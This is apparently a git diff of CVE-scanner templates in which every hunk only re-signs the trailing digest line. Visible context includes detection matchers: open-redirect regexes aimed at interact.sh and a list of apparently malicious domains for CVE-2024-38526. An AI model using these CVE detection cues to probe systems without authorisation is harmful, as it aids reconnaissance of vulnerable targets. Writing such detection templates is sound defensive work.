4a0a004730450220744772b1adca90468aaee2a07671941970b7e5c61e20c355c6cc783d5f3a0337022100fbe3cb55ab904fd44b1987947cd2b9aaaedbe01ba2d24816be1df3f3bba8e50c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202919566fe2e7e9423bc09c3edf7b7e0e11c3ac5e54015b67642010d867c4ec4f022100cd108f5e8fd2c57844a384851a658f8c55baa27556aa6da101d0e9e4826a7563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2021/CVE-2021-35042.yaml b/dast/cves/2021/CVE-2021-35042.yaml index 987d70b25d3..b77426548a8 100644 --- a/dast/cves/2021/CVE-2021-35042.yaml +++ b/dast/cves/2021/CVE-2021-35042.yaml @@ -65,4 +65,4 @@ http: - 'FROM\s+`([a-zA-Z_][a-zA-Z0-9_]*)`' - 'relation\s+([a-zA-Z_][a-zA-Z0-9_]*)' - "Table\\s+'[^']*\\.([a-zA-Z_][a-zA-Z0-9_]*)'" -# digest: 4a0a00473045022100b3388f386014281f5aa943ebdd3eca1a1c3b32bd9fba2747874b0c99002271fa02207476e74476639d2ffb58801236705a5dd8829a6877fd2883f3fdfd191a8eaefe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdcaa392a69abe220c0a873f077f15e6d26790a57af1841c74a8cfed7aa448590220080423a001e61235d77fe06b4ac542873238398651bfc8093bb71945838b3f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/CVE-2022-22965.yaml index fa1cbd61dcd..de0122f2bb9 100644 --- a/dast/cves/2022/CVE-2022-22965.yaml +++ b/dast/cves/2022/CVE-2022-22965.yaml @@ -59,4 +59,4 @@ http: words: - "User-Agent: Java" case-insensitive: true -# digest: 4a0a00473045022037cce94078d8b39e7da81784ebe327bea6b7feda8853f9944c3472047dc3a940022100a7b968f03114289d76aa31cf29ea08460d1334e6824993a23eb61abf756d7abe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb392a0e3208cc358b0707807f593d603cc6691d2e61b47d446db39038dee089022100aa2f8e3d164ec0a0b4d5cb0ff04b0f4fbecac6b8769db15d56704777cce16e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index cd2e7267834..a78a09a4f8c 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -70,4 +70,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# digest: 490a0046304402201d587d00feebac7c4058172ef994f02e8b48f8b7388edc0d659dbcd0d379e51f02205fa512de24b87b97c3961d6b691b2ed279453f78f5b40673c7886ad7ea117f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b39ccfbf784644953fe7252087aac86a192c47e2c8d40098efad27b59b4c7999022011675957cb013b15aec1408402080acedc6d7dc363ab61d102f8b6e2510f739c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/logs/aspnet-framework-exceptions.yaml b/file/logs/aspnet-framework-exceptions.yaml index 9cb3c4791c7..a46d20feacf 100644 --- a/file/logs/aspnet-framework-exceptions.yaml +++ b/file/logs/aspnet-framework-exceptions.yaml @@ -22,4 +22,4 @@ file: - 'InvalidOperationException' - 'UnauthorizedAccessException' - 'NotFound' -# digest: 490a004630440220605817aac792e5af78feac81573c41bca6133e62909769a788b890bab2f845450220593fa806a999f100192145a250825a9197c47d203603763ba7516bf50cb9734d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220587d0af6aa31458fcd70ebdadfe8c52fea71ce1065b4a9225ef6fb69f2d84ae0022100a3480a0bec2f816169ba95241bd09b965fed0f7c82a5753fe1ca6896237a69d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/logs/nodejs-framework-exceptions.yaml b/file/logs/nodejs-framework-exceptions.yaml index 21b3b43f276..71a17b0fd30 100644 --- a/file/logs/nodejs-framework-exceptions.yaml +++ b/file/logs/nodejs-framework-exceptions.yaml @@ -30,4 +30,4 @@ file: - 'BadRequestError' - 'MongoError' - 'SequelizeDatabaseError' -# digest: 4a0a0047304502201730da54a3608a01f0148a1db1e8af0f04bf859e243872f6ff4a6885423b3986022100875f7bfbe682203c0d5f3f4daf2783989c716e02726fb5495616a1c69e7ef274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8a7d6e570251bb71206abf0c41b6d26700090838fdbbcf34f6120d78f34b93e02203b9b818345f7c84f3ae8793fe1498bed222d9be3fce6f032ffd960ed416c1e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index da9f1766e90..3224963c973 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -56,4 +56,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4b0a00483046022100dea89bdab25fa4a9bd2298154c881a27e943d41b2f52ea13a946c3fcf3a7a6d5022100d8b5bb841b8f4c523bc841f60295f8cd58f101fc262031cb2c25ce974d43131e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f38b4c4f522b20ca9b60c558460a91a14cee186543b2b4d8423cbacfa335165022100d5caf6a30cd9aae4b3c69feb744bc58b0ea2f7304d9b61fe21b852082aa5fee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2022/CVE-2022-29455-headless.yaml b/headless/cves/2022/CVE-2022-29455-headless.yaml index 6784ce0431a..a772f1fb6ac 100644 --- a/headless/cves/2022/CVE-2022-29455-headless.yaml +++ b/headless/cves/2022/CVE-2022-29455-headless.yaml @@ -52,4 +52,4 @@ headless: words: - "elementor" case-insensitive: true -# digest: 490a004630440220741319307affb573d1fc1f2c716307baa784d83b976ac99c4b21e1957f97ce7e02207896dbdc4944fa8b04ada67c0362790269bb0322ace9ee18fb098bf2bb2011c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecbf788ebf1ff9c7cad2532fa0f399085f586438aaea1375e4eedc5eb47bf6c8022034ec9d8faa395a546414e224e131f823ac685f330dec7fffaf31e7d84a19e692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2024/CVE-2024-29882.yaml b/headless/cves/2024/CVE-2024-29882.yaml index 23de06da028..2dc04e503b1 100644 --- a/headless/cves/2024/CVE-2024-29882.yaml +++ b/headless/cves/2024/CVE-2024-29882.yaml @@ -50,4 +50,4 @@ headless: - "ConnectSRS</a>" condition: or case-insensitive: true -# digest: 4a0a00473045022022d730cf7f3a71c15147da0196d0571860dadee59f974d6213917ea17d455f26022100ea68d97d24d5aafd88d5bf6f88101c2ae11d93d148cba02671063fcaa916850f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d01ca6eb139d57a6e67f5e56421bc1ffd672d6cc7ea1957444f02285df9ae5802205dae95e3e4cfced9cfa7c7f9101b58515363b6b9835295f1dde9be4c70ed597c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2024/CVE-2024-38526.yaml b/headless/cves/2024/CVE-2024-38526.yaml index 2484fc9df0c..81caa34e675 100644 --- a/headless/cves/2024/CVE-2024-38526.yaml +++ b/headless/cves/2024/CVE-2024-38526.yaml @@ -60,4 +60,4 @@ headless: - "union.macoms.la" - "newcrbpc.com" part: urls -# digest: 4a0a004730450221008ff6ba38eb2eac1b5d31c9a82439238342f98f9ad6a979b81f09768b27defc89022016d744748b2e29786178ededcec128fa57e33ce615934eb18b7622ccbb18a1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eba2ec6e7f881272e7869125ada9c0e2b0467de496cf54a8cf9f6ba4fff5dd53022100e2ae72329cf6f91a9a0020d8f1b079b0e84db874a168f81d5ab21e3c6ef62f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml index acbd1532739..12db6e17a86 100644 --- a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml +++ b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml @@ -59,4 +59,4 @@ headless: - "compare_versions(nextjs_version, '> 14.0.0', '< 14.2.25')" - "compare_versions(nextjs_version, '> 15.0.0', '< 15.2.3')" condition: or -# digest: 4b0a0048304602210089c51e9cf021e6dddb3d06594a3203e755603bcffc75da78d57cf0fe3d523657022100ec6cd89ab622b3a92780317c83b20f933f6c6f0fd95dd71abf127413378c9270:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057328f1735bddb77893eb0c5db962ac47a2a9204562b97dc4d4b70d8093b0802022100880d18fa1d58320ab5d4e30929c2dfad08b3c72801daf64df45fea2b3f98eb3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2025/CVE-2025-8191.yaml b/headless/cves/2025/CVE-2025-8191.yaml index a9debd5afb5..65d9528f7c7 100644 --- a/headless/cves/2025/CVE-2025-8191.yaml +++ b/headless/cves/2025/CVE-2025-8191.yaml @@ -69,4 +69,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4a0a00473045022060bb31b4012db4c88a4b4536fcefa690ccf1c09a2ee896419fdf6f351f6582760221008b0f54c07b29dab2e4522cde8dbb6b3fed89de56fb674e993e30cd9182d6eda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022024a5b6846652c129698003d04b15989a18bf5e7ec494150436cd4a89969cdbe502200be6c954c87e81dfdb3c9ad0f58156c22f64868c70624a1000eda391c1425f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 13a12bdaeff..faed14b2fbe 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -62,4 +62,4 @@ http: group: 1 regex: - 'version:([0-9.]+)' -# digest: 4a0a0047304502203db01de1d432d53109ac90ff031751b98feddd0f27d8ff99ed5d57aad6228166022100a7a88dd2a6b1e7c11c17a11eef87b7cd14475568886aa81ef12e3ad8dd85f300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220784227d29e879d73d270c6e6b4db1141fe892a218db8d02edb6d8c21264c676c022061905c50f6f41fbc3f8d6d89dcefb8202552b5acea15bf036b60b74239a179d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0760.yaml b/http/cves/2000/CVE-2000-0760.yaml index 1a767053234..aed7a27f7b9 100644 --- a/http/cves/2000/CVE-2000-0760.yaml +++ b/http/cves/2000/CVE-2000-0760.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b281cd452784dd6fa15cabb03cbf78c3dd705688c67ee53c1998c7ee993bb71022100e0bba2cfa8e325ac6755137ff962d7b414ca07ffdd2b6c9c2881dbee5ee6c3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220404c36f0905f8ef37645f5eaddceb8a2641da40cb00dfe8c2356b90d7987a9d4022100b960ba80d21743aa25d3348de4138264ea82437becb94504dbba135ce3537b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 4f1bde32d97..b1ebf5ae482 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220790b4b0cbf62d5ddde432aa74220c1ae20758789e8afc35ea0b488f2703dcde502205eb293fa003e0719c85c5242d4bfa5aae90bf3c2f408eee8b5d6af47d12fa8a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba85753ed7f39ee33592b8ca3eaaf9079177fa2f6d70a190f4cce28be012e5480220198471a0d3a26ec32ccb1506e480d9f18729eabba5e340076ab2e92ea6430979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 98ae56a0bea..21ad0df5a4c 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e64d559984aea80e5cc38703c64776260c03f7303ef0fd66b142d30a7dd87b2902205a0671679b7ca5da420b60e54cbb9bdb83f7c72a5ee9794a0418d94b54497c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b14f4870b7fa682094506468481d03f017aed4fc1282a957bbe59777580b18002202b45a3928bad970c35890b70fee9f60dc57bc804731e4c3e07800fcb9943a6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index be815732018..abdfb69b65d 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100e15933703858406dce021f0408f9ce54122671d49d97edb3d811020fb5b3f319022100cebf115a45b7afafd50930e3caf2502850ceec903cb244529fd234880f4057a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088b6a6b4ce69c7aa340445a727d0ea56bab7878a71db1a31c5a91f01e91ce420022066866889a19a907656d32d7a88ddc4aedf843b2e103ae7a42d42df0469f5ece7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index c768f7beab2..1acb7127f5c 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220768e3806980602c265749417e06d984635550d9af9034af9119bfad0bcaa488c02203dafe04031eebe952d7222f26aec191f88d965de6c4080dea3593c40334d8f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a856c8fe1ac042273ab6b6aa11f940b48551126da9149399a1637f817e43bdcb02203550c0dbf3d5f147b5784779e6c088abbf4e2b2432a40bb4de9e9535e216ca0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3128.yaml b/http/cves/2005/CVE-2005-3128.yaml index 0172fb64181..95218aa57d7 100644 --- a/http/cves/2005/CVE-2005-3128.yaml +++ b/http/cves/2005/CVE-2005-3128.yaml @@ -44,4 +44,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100ee3088791103a38220785307481c0def294e5f7b44368c65bd20afd5083c867802206aeb3faccf5e8b7fd0d4975bbbaf61c61f6e8334703ad743dff36c0a70cacdab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e00b2085ef2d947ac472dfe5332ba41181b5e6e1daa16740bc722f72bad69e30220371d1c86805fe6808c65b368a055df53c7b9d7f3976efa4c7d9956eddc39d67e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 3a48031416d..d7c6d5fdeab 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220304350e18f3fac2261d93aea6c778d160b181cb8591c7e71a1a9044eb77e6f3402204c837f3a7b8bacf378cfc59b3251463e418562b2e3f23f9f4d38bc0230c30fb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c8252c5db01a4c62789f11fdd8963a3c74d8215f461a9501f1c28525bc40cd3022041a888dbd74be5dc5bcd871981136a4f3800133fcff83beb0d6da65dd6399553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 80d3049c4a9..66218b73aeb 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100bdf0ea19bfa360948de4b124dace2eca3fc58f37a2d381b43155f5edd97084c5022100ff0fa9e2292a1cb97c8f3a5ecd3967fc0dbbf788d484a39c322866629faedbb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3a224eba66eb6b81dd8927759559fd60da52614e33602fcd62d6f1a17f22d0802205af5f4b59416a6addabfa3984101aca348463573b28f82bc4e62436342a309d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3164e79dd00..89f4908285b 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207c9869995607aab2beace4e9c5efdcda1f0ad27852711d6285f8ce6719b009550220756e5788770b543bbe99dd545a3ecf19aa610515c5f168c234e4d4af01490da7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f69b2d2de81a69e9136d57f7e2be5536cace4f5b4b1c364d25e51d95707f8cfd022100ffcbb5dacf4a9fcfc8b68acd212c180949b778d9c707fdc6f57b3aca52a3cab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index cf8feecd8d3..55e2d354e86 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220251d36680412d4fb0aa5a2321330d53e1b60e5a8843ea626dc245b2c9c124b5b022100e2ee52ea80926ea16531a6954adec96ee275496372ae6844681c55e49e8476c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6afe871960710b3d4a6476076941a86bcc35a120405891bc88ed922d77a359902207c559c3b6291ca8c63532601a057bb48b3869984176772ab2ffe363a95768ed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index c0c6daa3fac..1329b25fce3 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220780f3453b24f35cc848f4be07e1c142b0f14ee157611b65c901c0367e17f2ebb02205d2fb77c53722f48b1171cf8a0df0c47f76510c76e43cb17cf27e196388d3251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c3ae9f59ce0df9081377cd99d057533444f80e37fbccd5ea14e2be41af4d80b022100e43c238d729f61116895e40ad69b03424db39960b94ea0b8cfd75a71cec82f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-3392.yaml b/http/cves/2006/CVE-2006-3392.yaml index 1829a89734b..b42d33eb05b 100644 --- a/http/cves/2006/CVE-2006-3392.yaml +++ b/http/cves/2006/CVE-2006-3392.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039960191b10e97d0ae8367547f9a2050a02fbd11d7c9b0b7d29b783afc6f2978022100d6f2ce0d42f2d2411167d0460f175a157dcc7b2a48feb64e56564757e2517852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041c2e202db6fc0cea14e0f889df257b1bc43e2438ce5f0ccc681a2075db9b0c802206382532f9baba2e6611546b97f75931152fb7abf59141a0f444de6678d353f96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 3712f4835cf..4704cab7b0a 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c0a4bf1377e401a72b14b11ab96bf300f294b17b6db5967aeac384e8fc2dea502204010dce97234319fcdeb1091ed201a866a5ebae4552d1a35155e30dba8b64168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bae266607c076f481dab74c4950b73aee47f477a371b4ed59ac70824a602852d022100e3d3c04abab86fd102b02754e84208ff07253a00abd82a38d81b6d08f4642f02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-2449.yaml b/http/cves/2007/CVE-2007-2449.yaml index b54561dcdb2..93b6966e048 100644 --- a/http/cves/2007/CVE-2007-2449.yaml +++ b/http/cves/2007/CVE-2007-2449.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203a35ad08e1b608595a766a9bd2c5ab7ae56e12998ecef3b26f14422baf4d10c1022100dcd8b15753da8f06c99926ce7dd8a7953b5a58edc74f29c081e36fb4fa7cce32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022188874fdf22c9aad0f6d39f80f71c6e6f5d8e3b115f32cb86eae077dcef9e40221008a1060f25d005d5eab407055c1addf815be9fd56f641297ea41014b6238f5278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 7908ce93a71..239e205c612 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b116fa0cff7f00935b077b655a1ad5f3aabc3c1d565f70f6929869a7f93a058022100af565988e17ba339ccc23f8fcaeb0bd438f76634b2464a64ba4fffe9fea4f1b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220209b90490bd8fac5e13c2088482b35a30ac0204a77ae49e22e1260c32959d490022100c662a83d3e2dcc96877ccd8481eaea542bcfcdca4a17063e8a24424426b40063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index f0d84bae5a1..d13872953ba 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e40a42e6a281d40ce544890d5a5711f16f14966b349b53809e412e06017ffda5022100cf3f8948e68c4468b0432791ab2a0161a7a6f234c0cf54397f3cabcbb1763c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c1dd28e7c83373c748a8114dc3c7a4129f72496cf0ef2019df4189b363515b8022100e612a5cab19f8c149f85089c4188c80b903101a34777e01c79b3d87adb567b4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index c6970d60a5b..239dfc0fa0d 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024774b78788edb5b04fc9e3cdbaa9f342bf24870f4e04be17e88bb5d86b73ccb022100f6d9c3d5601233132b22a9d036f95184db0a745db8a4818c6a368d1cbac60eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220457e36f0aaa0027fa665e3dd89db0b56a55c2e212d4e010dc1acbeb09cc677420220299658c5c473c896cc23ab9731313b10fc79e437973b7bee995f6dc3a7a869c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index c314c7af951..6f19fcd7b7d 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e82d1a11157cedcaf3de5d86cd2248b985968a9c50789c1f6949e00aadfe7044022100e2d61f5c679761e08772187e0d1a1e9c6ace43905a7cb3e3659ddb0c7c3bbd4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e9419f509fd01197103e23f7b3e71864b691cb3586b7c58ef39d75440b5629f022100c05809624260e145a2a0026a117388c711837eb3d25b45e1dab3aaa8652c4856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 2b0ad6a4caa..1db1f6fcd5c 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022076783e9b5b2f0673f0b19fdd5b22d279f8b56adf4ca0c2d2549ec77f0a8f3fd902207834417847bb715f20bce1ee55d5c21b41b8466c6873c129ebcc6fe99728183d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb48d97953ca47668a68e6056adba07ceb778797ed81d37d28ee2693aec86dd2022100b7bd8b8ae61b930cc6ef1292eaf5ed054d0202f85902077b68fed38c0a0aac91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 09fc2d04ae1..5c03f2b2f5e 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a41dfafee82785d299c46c64c5a0e796fb3a7b3f296ba50de9d8458423b5390202206f50f44296771df6d38eaf7bfa2475651cfdd5f87df747703cdcf9aa70f7d1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8f17c003862910a095a193e65d081075d27521ec491bbff946464b536c2f351022100aba51b67a027cb5e11632748e40240ec1536d207c5d37a12bbdec3f9731cdfdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index c74223a752a..4550f508213 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c7ded4d46a00d5c9401ef625b85f69d1b0ad744fae72615aebde8f6025d36f400221009d5c60b2f324cad4395e84a99c900eef71413ef8df9cd7b287b2707bbee8e53a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a5963e9d9dbcd75faf71f6c89e7e24f3f57d586625baabd90c4ea7baa465cab022035cf785785122d6df2bc2daca6e08843c21253627a67c71ef8ec97768b403aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index b6ffb598d7e..363d661f31c 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220300d946620b41dc38ca3f84f969c3cf35f68afd7dc2f5c6aba69c915f1a73cb302204536805dec719050f7ccf4d35cab5ae0cb7f750318657e238d43acec6da5d83c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e65e93c9e8a603b2e5edd332ff8fe07ecc488aee2c60fe7eec5fb85639c981a602206d03d36bd6edb1e244079df26c7cebd0e54bf91af67f0c3a372d928b797a8e1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index b25c1cd63d3..03a64b26b4d 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7a88efd02237a980e26a2a480891f3a4aa8caede7bc476b2ff13335af49c788022100e2d74a24820ddc2c3fe1cfe5d54ce3f2c8738020cc01770c0e31d50e7ad8f89d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 